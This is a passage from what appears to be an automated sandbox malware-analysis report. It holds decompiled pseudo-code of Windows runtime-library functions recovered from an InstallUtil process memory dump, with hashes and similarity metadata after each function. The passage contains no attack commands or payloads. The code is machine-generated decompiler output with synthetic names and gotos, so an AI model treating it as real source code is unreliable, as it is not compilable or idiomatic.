                      									__eflags = _v12 - 0xffffffff;
                      									if(_v12 != 0xffffffff) {
                      										_push(_v12);
                      										E013095D0();
                      									}
                      								} else {
                      									_t111 = _v12;
                      								}
                      								return _t111;
                      							} else {
                      								if(_t89 != 0) {
                      									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
                      									_t77 = E012E7D50();
                      									__eflags = _t77;
                      									if(_t77 == 0) {
                      										_t64 = 0x7ffe0384;
                      									} else {
                      										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
                      									}
                      									__eflags =  *_t64;
                      									if( *_t64 != 0) {
                      										_t64 =  *[fs:0x30];
                      										__eflags = _t64[0x240] & 0x00000004;
                      										if((_t64[0x240] & 0x00000004) != 0) {
                      											_t78 = E012E7D50();
                      											__eflags = _t78;
                      											if(_t78 == 0) {
                      												_t64 = 0x7ffe0385;
                      											} else {
                      												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
                      											}
                      											__eflags =  *_t64 & 0x00000020;
                      											if(( *_t64 & 0x00000020) != 0) {
                      												_t64 = E01347016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
                      											}
                      										}
                      									}
                      								}
                      								return _t64;
                      							}
                      						}
                      						_t97 = _t88;
                      						_t93 = _t109;
                      						E0135FDDA(_t97, _v12);
                      						_t105 =  *_t109;
                      						_t67 = _v12 + 1;
                      						_v12 = _t67;
                      						__eflags = _t105 - 0xffffffff;
                      						if(_t105 == 0xffffffff) {
                      							_t106 = 0;
                      							__eflags = 0;
                      						} else {
                      							_t106 =  *(_t105 + 0x14);
                      						}
                      						__eflags = _t67 - 2;
                      						if(_t67 > 2) {
                      							__eflags = _t109 - 0x13b5350;
                      							if(_t109 != 0x13b5350) {
                      								__eflags = _t106 - _v20;
                      								if(__eflags == 0) {
                      									_t93 = _t109;
                      									E0135FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
                      								}
                      							}
                      						}
                      						_push("RTL: Re-Waiting\n");
                      						_push(0);
                      						_push(0x65);
                      						_v20 = _t106;
                      						E01355720();
                      						_t104 = _v28;
                      						_t116 = _t116 + 0xc;
                      						continue;
                      					}
                      				}
                      			}

                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID: RTL: Re-Waiting
                      • API String ID: 0-316354757
                      • Opcode ID: a2954b68b5ab7a998fea85d757a3bc11db7f36a9f7eca6caea0359944fbb2594
                      • Instruction ID: 9c65ecb2e4eae6f6433078a764e743ad6f6e8d3614b5b132e783fa85b6ca4bbd
                      • Opcode Fuzzy Hash: a2954b68b5ab7a998fea85d757a3bc11db7f36a9f7eca6caea0359944fbb2594
                      • Instruction Fuzzy Hash: AB613731A10645DFEB36DF6CC880B7E7BE9EB44B18F140269DB15A72C1CB74A905CB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 78%
                      			E012C52A5(char __ecx) {
                      				char _v20;
                      				char _v28;
                      				char _v29;
                      				void* _v32;
                      				void* _v36;
                      				void* _v37;
                      				void* _v38;
                      				void* _v40;
                      				void* _v46;
                      				void* _v64;
                      				void* __ebx;
                      				intOrPtr* _t49;
                      				signed int _t53;
                      				short _t85;
                      				signed int _t87;
                      				signed int _t88;
                      				signed int _t89;
                      				intOrPtr _t101;
                      				intOrPtr* _t102;
                      				intOrPtr* _t104;
                      				signed int _t106;
                      				void* _t108;
                      
                      				_t93 = __ecx;
                      				_t108 = (_t106 & 0xfffffff8) - 0x1c;
                      				_push(_t88);
                      				_v29 = __ecx;
                      				_t89 = _t88 | 0xffffffff;
                      				while(1) {
                      					E012DEEF0(0x13b79a0);
                      					_t104 =  *0x13b8210; // 0xe62c70
                      					if(_t104 == 0) {
                      						break;
                      					}
                      					asm("lock inc dword [esi]");
                      					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
                      					E012DEB70(_t93, 0x13b79a0);
                      					if( *((char*)(_t108 + 0xf)) != 0) {
                      						_t101 =  *0x7ffe02dc;
                      						__eflags =  *(_t104 + 0x14) & 0x00000001;
                      						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
                      							L9:
                      							_push(0);
                      							_push(0);
                      							_push(0);
                      							_push(0);
                      							_push(0x90028);
                      							_push(_t108 + 0x20);
                      							_push(0);
                      							_push(0);
                      							_push(0);
                      							_push( *((intOrPtr*)(_t104 + 4)));
                      							_t53 = E01309890();
                      							__eflags = _t53;
                      							if(_t53 >= 0) {
                      								__eflags =  *(_t104 + 0x14) & 0x00000001;
                      								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
                      									E012DEEF0(0x13b79a0);
                      									 *((intOrPtr*)(_t104 + 8)) = _t101;
                      									E012DEB70(0, 0x13b79a0);
                      								}
                      								goto L3;
                      							}
                      							__eflags = _t53 - 0xc0000012;
                      							if(__eflags == 0) {
                      								L12:
                      								_t13 = _t104 + 0xc; // 0xe62c7d
                      								_t93 = _t13;
                      								 *((char*)(_t108 + 0x12)) = 0;
                      								__eflags = E012FF0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                      								if(__eflags >= 0) {
                      									L15:
                      									_t102 = _v28;
                      									 *_t102 = 2;
                      									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                      									E012DEEF0(0x13b79a0);
                      									__eflags =  *0x13b8210 - _t104; // 0xe62c70
                      									if(__eflags == 0) {
                      										__eflags =  *((char*)(_t108 + 0xe));
                      										_t95 =  *((intOrPtr*)(_t108 + 0x14));
                      										 *0x13b8210 = _t102;
                      										_t32 = _t102 + 0xc; // 0x0
                      										 *_t95 =  *_t32;
                      										_t33 = _t102 + 0x10; // 0x0
                      										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
                      										_t35 = _t102 + 4; // 0xffffffff
                      										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
                      										if(__eflags != 0) {
                      											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
                      											E01344888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
                      										}
                      										E012DEB70(_t95, 0x13b79a0);
                      										asm("lock xadd [esi], eax");
                      										if(__eflags == 0) {
                      											_push( *((intOrPtr*)(_t104 + 4)));
                      											E013095D0();
                      											L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                      											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                      										}
                      										asm("lock xadd [esi], ebx");
                      										__eflags = _t89 == 1;
                      										if(_t89 == 1) {
                      											_push( *((intOrPtr*)(_t104 + 4)));
                      											E013095D0();
                      											L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                      											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                      										}
                      										_t49 = _t102;
                      										L4:
                      										return _t49;
                      									}
                      									E012DEB70(_t93, 0x13b79a0);
                      									asm("lock xadd [esi], eax");
                      									if(__eflags == 0) {
                      										_push( *((intOrPtr*)(_t104 + 4)));
                      										E013095D0();
                      										L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                      										_t102 =  *((intOrPtr*)(_t108 + 0x10));
                      									}
                      									 *_t102 = 1;
                      									asm("lock xadd [edi], eax");
                      									if(__eflags == 0) {
                      										_t28 = _t102 + 4; // 0xffffffff
                      										_push( *_t28);
                      										E013095D0();
                      										L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
                      									}
                      									continue;
                      								}
                      								_t93 =  &_v20;
                      								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
                      								_t85 = 6;
                      								_v20 = _t85;
                      								_t87 = E012FF0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                      								__eflags = _t87;
                      								if(_t87 < 0) {
                      									goto L3;
                      								}
                      								 *((char*)(_t108 + 0xe)) = 1;
                      								goto L15;
                      							}
                      							__eflags = _t53 - 0xc000026e;
                      							if(__eflags != 0) {
                      								goto L3;
                      							}
                      							goto L12;
                      						}
                      						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
                      						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
                      							goto L3;
                      						} else {
                      							goto L9;
                      						}
                      					}
                      					L3:
                      					_t49 = _t104;
                      					goto L4;
                      				}
                      				_t49 = 0;
                      				goto L4;
                      			}

                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID: p,
                      • API String ID: 0-2703748495
                      • Opcode ID: deae486aed4a92fe6b6d3ed1b6ee1d7bc8662b60429eec2aaea64e424bf9a0ca
                      • Instruction ID: 1034b555865b5985450651cecb671459183fde6e29033fed66489e4d47445513
                      • Opcode Fuzzy Hash: deae486aed4a92fe6b6d3ed1b6ee1d7bc8662b60429eec2aaea64e424bf9a0ca
                      • Instruction Fuzzy Hash: 6C51F031255742ABD325EF28C841B27BBE5FF90B18F14091EF69987691E7B0F844C792
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 80%
                      			E01390EA5(void* __ecx, void* __edx) {
                      				signed int _v20;
                      				char _v24;
                      				intOrPtr _v28;
                      				unsigned int _v32;
                      				signed int _v36;
                      				intOrPtr _v40;
                      				char _v44;
                      				intOrPtr _v64;
                      				void* __ebx;
                      				void* __edi;
                      				signed int _t58;
                      				unsigned int _t60;
                      				intOrPtr _t62;
                      				char* _t67;
                      				char* _t69;
                      				void* _t80;
                      				void* _t83;
                      				intOrPtr _t93;
                      				intOrPtr _t115;
                      				char _t117;
                      				void* _t120;
                      
                      				_t83 = __edx;
                      				_t117 = 0;
                      				_t120 = __ecx;
                      				_v44 = 0;
                      				if(E0138FF69(__ecx,  &_v44,  &_v32) < 0) {
                      					L24:
                      					_t109 = _v44;
                      					if(_v44 != 0) {
                      						E01391074(_t83, _t120, _t109, _t117, _t117);
                      					}
                      					L26:
                      					return _t117;
                      				}
                      				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
                      				_t5 = _t83 + 1; // 0x1
                      				_v36 = _t5 << 0xc;
                      				_v40 = _t93;
                      				_t58 =  *(_t93 + 0xc) & 0x40000000;
                      				asm("sbb ebx, ebx");
                      				_t83 = ( ~_t58 & 0x0000003c) + 4;
                      				if(_t58 != 0) {
                      					_push(0);
                      					_push(0x14);
                      					_push( &_v24);
                      					_push(3);
                      					_push(_t93);
                      					_push(0xffffffff);
                      					_t80 = E01309730();
                      					_t115 = _v64;
                      					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
                      						_push(_t93);
                      						E0138A80D(_t115, 1, _v20, _t117);
                      						_t83 = 4;
                      					}
                      				}
                      				if(E0138A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
                      					goto L24;
                      				}
                      				_t60 = _v32;
                      				_t97 = (_t60 != 0x100000) + 1;
                      				_t83 = (_v44 -  *0x13b8b04 >> 0x14) + (_v44 -  *0x13b8b04 >> 0x14);
                      				_v28 = (_t60 != 0x100000) + 1;
                      				_t62 = _t83 + (_t60 >> 0x14) * 2;
                      				_v40 = _t62;
                      				if(_t83 >= _t62) {
                      					L10:
                      					asm("lock xadd [eax], ecx");
                      					asm("lock xadd [eax], ecx");
                      					if(E012E7D50() == 0) {
                      						_t67 = 0x7ffe0380;
                      					} else {
                      						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                      					}
                      					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                      						E0138138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
                      					}
                      					if(E012E7D50() == 0) {
                      						_t69 = 0x7ffe0388;
                      					} else {
                      						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                      					}
                      					if( *_t69 != 0) {
                      						E0137FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
                      					}
                      					if(( *0x13b8724 & 0x00000008) != 0) {
                      						E013852F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
                      					}
                      					_t117 = _v44;
                      					goto L26;
                      				}
                      				while(E013915B5(0x13b8ae4, _t83, _t97, _t97) >= 0) {
                      					_t97 = _v28;
                      					_t83 = _t83 + 2;
                      					if(_t83 < _v40) {
                      						continue;
                      					}
                      					goto L10;
                      				}
                      				goto L24;
                      			}

                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID: `
                      • API String ID: 0-2679148245
                      • Opcode ID: ec3281c7a1d6b69d01c34ecc6bce460524a152163ce3c4134a6fa5cae21b35a4
                      • Instruction ID: c93c79fe4b9393e8103518899daf208eb72a4ba90229758b42154777861d537a
                      • Opcode Fuzzy Hash: ec3281c7a1d6b69d01c34ecc6bce460524a152163ce3c4134a6fa5cae21b35a4
                      • Instruction Fuzzy Hash: A751B2713043429FEB25DF28D984B1BBBE9EBC4718F04092DFA9697290D771E909C762
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 75%
                      			E012FF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
                      				intOrPtr _v8;
                      				intOrPtr _v12;
                      				intOrPtr _v16;
                      				char* _v20;
                      				intOrPtr _v24;
                      				char _v28;
                      				intOrPtr _v32;
                      				char _v36;
                      				char _v44;
                      				char _v52;
                      				intOrPtr _v56;
                      				char _v60;
                      				intOrPtr _v72;
                      				void* _t51;
                      				void* _t58;
                      				signed short _t82;
                      				short _t84;
                      				signed int _t91;
                      				signed int _t100;
                      				signed short* _t103;
                      				void* _t108;
                      				intOrPtr* _t109;
                      
                      				_t103 = __ecx;
                      				_t82 = __edx;
                      				_t51 = E012E4120(0, __ecx, 0,  &_v52, 0, 0, 0);
                      				if(_t51 >= 0) {
                      					_push(0x21);
                      					_push(3);
                      					_v56 =  *0x7ffe02dc;
                      					_v20 =  &_v52;
                      					_push( &_v44);
                      					_v28 = 0x18;
                      					_push( &_v28);
                      					_push(0x100020);
                      					_v24 = 0;
                      					_push( &_v60);
                      					_v16 = 0x40;
                      					_v12 = 0;
                      					_v8 = 0;
                      					_t58 = E01309830();
                      					_t87 =  *[fs:0x30];
                      					_t108 = _t58;
                      					L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
                      					if(_t108 < 0) {
                      						L11:
                      						_t51 = _t108;
                      					} else {
                      						_push(4);
                      						_push(8);
                      						_push( &_v36);
                      						_push( &_v44);
                      						_push(_v60);
                      						_t108 = E01309990();
                      						if(_t108 < 0) {
                      							L10:
                      							_push(_v60);
                      							E013095D0();
                      							goto L11;
                      						} else {
                      							_t109 = L012E4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
                      							if(_t109 == 0) {
                      								_t108 = 0xc0000017;
                      								goto L10;
                      							} else {
                      								_t21 = _t109 + 0x18; // 0x18
                      								 *((intOrPtr*)(_t109 + 4)) = _v60;
                      								 *_t109 = 1;
                      								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
                      								 *(_t109 + 0xe) = _t82;
                      								 *((intOrPtr*)(_t109 + 8)) = _v56;
                      								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
                      								E0130F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
                      								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                      								 *((short*)(_t109 + 0xc)) =  *_t103;
                      								_t91 =  *_t103 & 0x0000ffff;
                      								_t100 = _t91 & 0xfffffffe;
                      								_t84 = 0x5c;
                      								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
                      									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
                      										_push(_v60);
                      										E013095D0();
                      										L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
                      										_t51 = 0xc0000106;
                      									} else {
                      										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
                      										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                      										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
                      										goto L5;
                      									}
                      								} else {
                      									L5:
                      									 *_a4 = _t109;
                      									_t51 = 0;
                      								}
                      							}
                      						}
                      					}
                      				}
                      				return _t51;
                      			}

                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID: @
                      • API String ID: 0-2766056989
                      • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                      • Instruction ID: 1d277d87cd824bed432633d2e8df5c4e6b0de07c5a4184816d40f47b7eccf36e
                      • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                      • Instruction Fuzzy Hash: 6B517A72514711AFD321DF29C841A6BBBF8FF88714F00892EFA9587690E7B4E914CB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 75%
                      			E01343540(intOrPtr _a4) {
                      				signed int _v12;
                      				intOrPtr _v88;
                      				intOrPtr _v92;
                      				char _v96;
                      				char _v352;
                      				char _v1072;
                      				intOrPtr _v1140;
                      				intOrPtr _v1148;
                      				char _v1152;
                      				char _v1156;
                      				char _v1160;
                      				char _v1164;
                      				char _v1168;
                      				char* _v1172;
                      				short _v1174;
                      				char _v1176;
                      				char _v1180;
                      				char _v1192;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				void* __ebp;
                      				short _t41;
                      				short _t42;
                      				intOrPtr _t80;
                      				intOrPtr _t81;
                      				signed int _t82;
                      				void* _t83;
                      
                      				_v12 =  *0x13bd360 ^ _t82;
                      				_t41 = 0x14;
                      				_v1176 = _t41;
                      				_t42 = 0x16;
                      				_v1174 = _t42;
                      				_v1164 = 0x100;
                      				_v1172 = L"BinaryHash";
                      				_t81 = E01300BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
                      				if(_t81 < 0) {
                      					L11:
                      					_t75 = _t81;
                      					E01343706(0, _t81, _t79, _t80);
                      					L12:
                      					if(_a4 != 0xc000047f) {
                      						E0130FA60( &_v1152, 0, 0x50);
                      						_v1152 = 0x60c201e;
                      						_v1148 = 1;
                      						_v1140 = E01343540;
                      						E0130FA60( &_v1072, 0, 0x2cc);
                      						_push( &_v1072);
                      						E0131DDD0( &_v1072, _t75, _t79, _t80, _t81);
                      						E01350C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
                      						_push(_v1152);
                      						_push(0xffffffff);
                      						E013097C0();
                      					}
                      					return E0130B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
                      				}
                      				_t79 =  &_v352;
                      				_t81 = E01343971(0, _a4,  &_v352,  &_v1156);
                      				if(_t81 < 0) {
                      					goto L11;
                      				}
                      				_t75 = _v1156;
                      				_t79 =  &_v1160;
                      				_t81 = E01343884(_v1156,  &_v1160,  &_v1168);
                      				if(_t81 >= 0) {
                      					_t80 = _v1160;
                      					E0130FA60( &_v96, 0, 0x50);
                      					_t83 = _t83 + 0xc;
                      					_push( &_v1180);
                      					_push(0x50);
                      					_push( &_v96);
                      					_push(2);
                      					_push( &_v1176);
                      					_push(_v1156);
                      					_t81 = E01309650();
                      					if(_t81 >= 0) {
                      						if(_v92 != 3 || _v88 == 0) {
                      							_t81 = 0xc000090b;
                      						}
                      						if(_t81 >= 0) {
                      							_t75 = _a4;
                      							_t79 =  &_v352;
                      							E01343787(_a4,  &_v352, _t80);
                      						}
                      					}
                      					L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
                      				}
                      				_push(_v1156);
                      				E013095D0();
                      				if(_t81 >= 0) {
                      					goto L12;
                      				} else {
                      					goto L11;
                      				}
                      			}

                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID: BinaryHash
                      • API String ID: 0-2202222882
                      • Opcode ID: 1d810712da27c50825571f4417e9be944d4b109b95d7488e418688abf6e689a7
                      • Instruction ID: 76d2678738640a9d3f898103cfa88d7571e635d777fb134b7e12967a5db55cef
                      • Opcode Fuzzy Hash: 1d810712da27c50825571f4417e9be944d4b109b95d7488e418688abf6e689a7
                      • Instruction Fuzzy Hash: 3C4167B1D0052D9BDB21DA54CC80FDEB7BCAB54718F0045A5EB08A7281DB34AE88CF94
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 71%
                      			E013905AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                      				signed int _v20;
                      				char _v24;
                      				signed int _v28;
                      				char _v32;
                      				signed int _v36;
                      				intOrPtr _v40;
                      				void* __ebx;
                      				void* _t35;
                      				signed int _t42;
                      				char* _t48;
                      				signed int _t59;
                      				signed char _t61;
                      				signed int* _t79;
                      				void* _t88;
                      
                      				_v28 = __edx;
                      				_t79 = __ecx;
                      				if(E013907DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
                      					L13:
                      					_t35 = 0;
                      					L14:
                      					return _t35;
                      				}
                      				_t61 = __ecx[1];
                      				_t59 = __ecx[0xf];
                      				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
                      				_v36 = _a8 << 0xc;
                      				_t42 =  *(_t59 + 0xc) & 0x40000000;
                      				asm("sbb esi, esi");
                      				_t88 = ( ~_t42 & 0x0000003c) + 4;
                      				if(_t42 != 0) {
                      					_push(0);
                      					_push(0x14);
                      					_push( &_v24);
                      					_push(3);
                      					_push(_t59);
                      					_push(0xffffffff);
                      					if(E01309730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
                      						_push(_t61);
                      						E0138A80D(_t59, 1, _v20, 0);
                      						_t88 = 4;
                      					}
                      				}
                      				_t35 = E0138A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
                      				if(_t35 < 0) {
                      					goto L14;
                      				}
                      				E01391293(_t79, _v40, E013907DF(_t79, _v28,  &_a4,  &_a8, 1));
                      				if(E012E7D50() == 0) {
                      					_t48 = 0x7ffe0380;
                      				} else {
                      					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                      				}
                      				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                      					E0138138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
                      				}
                      				goto L13;
                      			}

                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID: `
                      • API String ID: 0-2679148245
                      • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                      • Instruction ID: 72d979d557a67694706319508b19b8cb7316befe196d8ac25a7ad8142df59588
                      • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                      • Instruction Fuzzy Hash: AB31B0326043466BEB14DE29CD45F9A7BDDEBC4768F144229BA58AB280D770E904CBE1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 72%
                      			E01343884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                      				char _v8;
                      				intOrPtr _v12;
                      				intOrPtr* _v16;
                      				char* _v20;
                      				short _v22;
                      				char _v24;
                      				intOrPtr _t38;
                      				short _t40;
                      				short _t41;
                      				void* _t44;
                      				intOrPtr _t47;
                      				void* _t48;
                      
                      				_v16 = __edx;
                      				_t40 = 0x14;
                      				_v24 = _t40;
                      				_t41 = 0x16;
                      				_v22 = _t41;
                      				_t38 = 0;
                      				_v12 = __ecx;
                      				_push( &_v8);
                      				_push(0);
                      				_push(0);
                      				_push(2);
                      				_t43 =  &_v24;
                      				_v20 = L"BinaryName";
                      				_push( &_v24);
                      				_push(__ecx);
                      				_t47 = 0;
                      				_t48 = E01309650();
                      				if(_t48 >= 0) {
                      					_t48 = 0xc000090b;
                      				}
                      				if(_t48 != 0xc0000023) {
                      					_t44 = 0;
                      					L13:
                      					if(_t48 < 0) {
                      						L16:
                      						if(_t47 != 0) {
                      							L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
                      						}
                      						L18:
                      						return _t48;
                      					}
                      					 *_v16 = _t38;
                      					 *_a4 = _t47;
                      					goto L18;
                      				}
                      				_t47 = L012E4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                      				if(_t47 != 0) {
                      					_push( &_v8);
                      					_push(_v8);
                      					_push(_t47);
                      					_push(2);
                      					_push( &_v24);
                      					_push(_v12);
                      					_t48 = E01309650();
                      					if(_t48 < 0) {
                      						_t44 = 0;
                      						goto L16;
                      					}
                      					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
                      						_t48 = 0xc000090b;
                      					}
                      					_t44 = 0;
                      					if(_t48 < 0) {
                      						goto L16;
                      					} else {
                      						_t17 = _t47 + 0xc; // 0xc
                      						_t38 = _t17;
                      						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
                      							_t48 = 0xc000090b;
                      						}
                      						goto L13;
                      					}
                      				}
                      				_t48 = _t48 + 0xfffffff4;
                      				goto L18;
                      			}

                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID: BinaryName
                      • API String ID: 0-215506332
                      • Opcode ID: 7e4d25aaaea92ae5aafd0c6f4d2cd7aecad01435a1fb519465c2235fa685d0ca
                      • Instruction ID: 74b259491bf3f18dbe125e648b60a387b498e51bb441e70516b7a9ef8ae31649
                      • Opcode Fuzzy Hash: 7e4d25aaaea92ae5aafd0c6f4d2cd7aecad01435a1fb519465c2235fa685d0ca
                      • Instruction Fuzzy Hash: F031E53690052ABFEB15DA5CC945E7BFBF4FF40728F014169E915A7291D730AE04C7A0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 33%
                      			E012FD294(void* __ecx, char __edx, void* __eflags) {
                      				signed int _v8;
                      				char _v52;
                      				signed int _v56;
                      				signed int _v60;
                      				intOrPtr _v64;
                      				char* _v68;
                      				intOrPtr _v72;
                      				char _v76;
                      				signed int _v84;
                      				intOrPtr _v88;
                      				char _v92;
